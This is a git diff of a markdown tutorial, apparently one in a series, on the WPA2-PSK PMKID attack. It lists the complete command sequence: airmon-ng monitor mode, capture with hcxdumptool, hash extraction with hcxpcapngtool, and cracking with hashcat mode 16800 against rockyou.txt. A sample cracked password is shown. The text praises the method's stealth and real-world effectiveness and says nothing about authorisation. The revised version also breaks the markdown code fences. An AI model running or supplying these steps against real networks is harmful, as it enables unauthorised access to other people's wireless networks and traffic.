--- a/3.wpa2_pmkid_attack.md
+++ b/3.wpa2_pmkid_attack.md
@@ -1,98 +1,84 @@
-
 # 🛡️ WPA2-PSK PMKID Attack – Offline, Clientless Method
 
 ## 🔍 What is the PMKID Attack?
 
-The PMKID attack is a modern, stealthy method to obtain the WPA2-PSK password **without capturing a full handshake** and **without requiring a connected client**.
+The PMKID attack is a stealthy, modern method to recover the WPA2-PSK **without capturing a full 4-way handshake** and **without requiring any connected client**.
 
-Instead, it abuses a feature in some APs where the **PMKID** is included in the first EAPOL message.
+It exploits a feature in some access points that leak the **PMKID** in the first EAPOL message.
 
 ---
 
 ## 💡 Why use PMKID?
 
-- ✅ No deauths needed
-- ✅ No connected clients required
-- ✅ Silent/stealthy
-- ✅ Fully offline crack
-- ✅ Faster and more scriptable than traditional handshake methods
+- ✅ No deauths
+- ✅ No connected clients
+- ✅ Stealthy & passive
+- ✅ Fully offline cracking
+- ✅ Faster and more scriptable than handshake capture
 
 ---
 
-## 🧠 How it Works
+## 🧠 How It Works
 
-The PMKID (Pairwise Master Key Identifier) is generated using:
+The **Pairwise Master Key Identifier (PMKID)** is computed from:
 
 - The **SSID**
 - The **MAC address of the AP (BSSID)**
-- The **PSK (Pre-Shared Key)**
+- The **Pre-Shared Key (PSK)**
 
-If the AP includes the PMKID in the EAPOL frames, it can be captured directly and cracked offline.
+If the AP includes the PMKID in EAPOL frames, it can be captured directly and cracked offline — no handshake needed.
 
 ---
 
-## ⚙️ Tools Required
+## ⚙️ Required Tools
 
-- `hcxdumptool` – to capture PMKID packets
-- `hcxpcapngtool` – to extract hash from the capture file
-- `hashcat` – to perform the actual brute-force attack
+- `hcxdumptool` – captures PMKID from the air  
+- `hcxpcapngtool` – extracts the hash  
+- `hashcat` – cracks the hash offline
 
 ---
 
 ## 🧭 Attack Flow
 
-### 1. Put interface in monitor mode
+### 1. Enable monitor mode
 
 ```bash
 sudo airmon-ng check kill
 sudo airmon-ng start wlan0
-```
 
-### 2. Capture PMKID using hcxdumptool
+2. Capture PMKID
 
-```bash
 sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
-```
 
-Let it run for a bit while it passively collects PMKID packets.
+Let it run for a while and passively collect PMKID packets.
+3. Extract hash
 
-### 3. Extract hash for cracking
-
-```bash
 hcxpcapngtool -o pmkid_hash.txt pmkid.pcapng
-```
 
-### 4. Crack the hash using hashcat
+4. Crack the hash
 
-```bash
 hashcat -m 16800 pmkid_hash.txt rockyou.txt
-```
 
-- `-m 16800`: mode for WPA-PMKID
-- `rockyou.txt`: your wordlist
+    -m 16800: WPA-PMKID mode
 
----
+    rockyou.txt: your wordlist
 
-## 🧪 Output Example
+🧪 Example Output
 
-```bash
 Session..........: hashcat
 Hash.Type........: WPA-PMKID-PBKDF2
 Status...........: Cracked
 Password.........: supersecurewifi
-```
 
----
+📌 Notes
 
-## 📌 Notes
+    Not all APs expose PMKID — some are immune
 
-- Not all APs expose PMKID — some models are immune
-- Works best on modern routers using 802.11i
-- Still valid for many networks in the wild
+    Best results on modern routers (802.11i)
 
----
+    Still widely effective in real-world networks
 
-This is a passive, elegant, and powerful technique.  
+This is a passive, elegant, and powerful technique.
 No noise. No clients. Just results.
 
-Next up: Rogue APs!
+Next up: Rogue APs 🔥
